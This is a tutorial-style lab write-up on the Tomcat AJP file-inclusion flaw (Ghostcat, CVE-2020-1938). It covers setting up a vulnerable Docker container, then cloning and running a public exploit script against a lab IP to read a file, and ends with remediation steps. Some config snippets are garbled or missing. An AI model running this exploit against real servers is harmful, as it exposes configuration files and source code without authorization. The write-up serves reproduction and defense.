1. Principle of vulnerability
Tomcat server is a free open source web application server. After installation, the ajp connector will be enabled by default to facilitate interaction with other web servers through the ajp protocol. It is a lightweight application server and is commonly used in small and medium-sized systems and situations where there are not many concurrent access users. It is the first choice for developing and debugging JSP programs. Tomcat, like Web servers such as IIS, has the function of processing HTML pages. In addition, it is also a Servlet and JSP container. An independent Servlet container is the default mode of Tomcat. However, Tomcat's ability to handle static HTML is not as good as the Apache server. Tomcat is a project developed by the Apache open source organization to handle HTTP services. Both are free and can be run as independent web servers. Apache Tomcat will open the AJP connector to facilitate interaction with other web servers through the AJP protocol. This vulnerability is caused by a flaw in the Tomcat AJP protocol. An attacker can read any file in the webapp directory by constructing specific parameters.
2. Vulnerability overview and analysis
Tomcat is a project developed by the Apache open source organization to handle HTTP services. Both are free and can be run as independent web servers. The Apache Tomcat server has a file inclusion vulnerability. An attacker can use this vulnerability to read or include any files in all webapp directories on Tomcat, such as webapp configuration files or source code.
AJP Connector
The Apache Tomcat server establishes a connection with the client program through the Connector connector component, which represents the endpoint that receives the request and returns the response. That is, the Connector component is responsible for receiving the customer's request and sending the response result of the Tomcat server to the customer. In the Apache Tomcat server, the 8080 port we usually use the most is the so-called Http Connector, which uses the Http (HTTP/1.1) protocol.
In the conf/server.xml file, its corresponding configuration is
<Connectorport=”8080″protocol=”HTTP/1.1″connectionTimeout=”20000″redirectPort=”8443″ />The AJP Connector uses the AJP protocol (Apache Jserv Protocol), which is a directed packet protocol. For performance reasons, using binary format to transmit readable text can reduce the processing cost of HTTP requests, so it is mainly used in scenarios that require clustering and reverse proxies.
The configuration corresponding to the Ajp protocol is
<Connectorport=”8009″protocol=”AJP/1.3″redirectPort=”8443″ />The Tomcat server opens this port to the external network by default. There are two ways for web clients to access the Tomcat server:
Apache server
(1) AJP is a binary TCP transmission protocol. The browser cannot use AJP. Instead, Apache first communicates with Tomca for AJP, and then Apache performs a reverse proxy through the proxy_ajp module, converts it into an HTTP server and then exposes it to the user, allowing the user to access.
(2) The reason for this is that compared to the HTTP plain text protocol, it has higher efficiency and performance, and a lot of optimizations have also been made. To a certain extent, AJP can be understood as the binary version of HTTP, which is widely used to speed up transmission efficiency. The actual situation is that there are very few servers like Apache that have the proxy_ajp module that can reverse proxy the AJP protocol, so the AJP protocol is rarely used in production environments.
3. Scope of influence
Apache Tomcat 6
Tomcat 7 series <7.0.100
Tomcat 8 series < 8.5.51
Tomcat 9 series <9.0.31
4. Build a weak environment
4.1 Ubuntu
4.2 Update resources update
4.3 Install docker
sudo apt-get update
sudo apt-get install docker
sudo apt-get install docker.io
sudo apt-get install docker-registry
sudo docker version
4.4 Install nmap
apt-get install nmap
4.5 Install Tomcat
docker search Tomcat-8.5.32
docker pull duonghuuphuc/tomcat-8.5.32
4.6 View the pulled Tomcat image
docker images
4.7 Boot Image
Docker run -d -p 8080:8080 -p 8009:8009 –name
ghostcat duonghuuphuc/tomcat-8.5.32
docker port ghostcat
4.8 Check the ip address is 192.168.86.129
ifconfig -a
4.9 If the browser can access the Tomcat page, it means the environment is set up successfully
192.168.86.129:8080
5.Vulnerability Recurrence
5.1
docker exec -it ghostcat /bin/bash
cd webapps/ROOT/
5.2 Add test files
echo ‘this is CVE-2020-1938’>test.txt
ls
cat test.txt
5.3
exp address: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
5.4
cd CNVD-2020-10487-Tomcat-Ajp-lfi/
ls
chomd +x CNVD-2020-10487-Tomcat-Ajp-lfi.py
ls
5.5 Use exp to read the file
****./****CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f test.txt 192.168.86.129
Test read successful
6. Vulnerability repair and defense methods
Apache Tomcat files contain vulnerabilities that need to be fixed in newer versions. Currently, Apache has officially released versions 9.0.31, 8.5.51 and 7.0.100 to fix this vulnerability. If relevant users are temporarily unable to upgrade the version, they can use the following methods according to their own circumstances. Protection measures: If you do not need to use the Tomcat AJP protocol, you can directly close the AJP Connector, or change its listening address to only listen to the localhost of the machine; if you need to use the Tomcat AJP protocol, you can set the authentication credentials according to the version configuration protocol properties. as follows:
- Immediately upgrade Tomcat to version 9.0.31, 8.5.51 or 7.0.100 for repair.
-
Disable or restrict the AJP protocol.
Edit /conf/server.xml and find the following line:
Comment out this line (or delete it):
Configure the secret to set the authentication credentials for the AJP protocol.
For example (note that YOUR_TOMCAT_AJP_SECRET must be changed to a value that is highly secure and cannot be easily guessed):
-
Configure access control: Properly configuring access control is one of the important measures to prevent vulnerabilities. By configuring appropriate access control policies, you can restrict access to sensitive files and allow only authorized users to perform relevant operations.
-
Regular monitoring and updates: Regularly monitor vulnerability information and security bulletins, and update relevant software and patches in a timely manner to ensure the security and stability of the system.
-
Strengthen server security: In addition to taking measures against specific vulnerabilities, the security of the entire server should also be strengthened. For example, use a firewall to restrict access to the server, enable Web Application Firewall (WAF), configure SSL/TLS encrypted transmission, use strong passwords and change passwords regularly, disable unnecessary services, etc.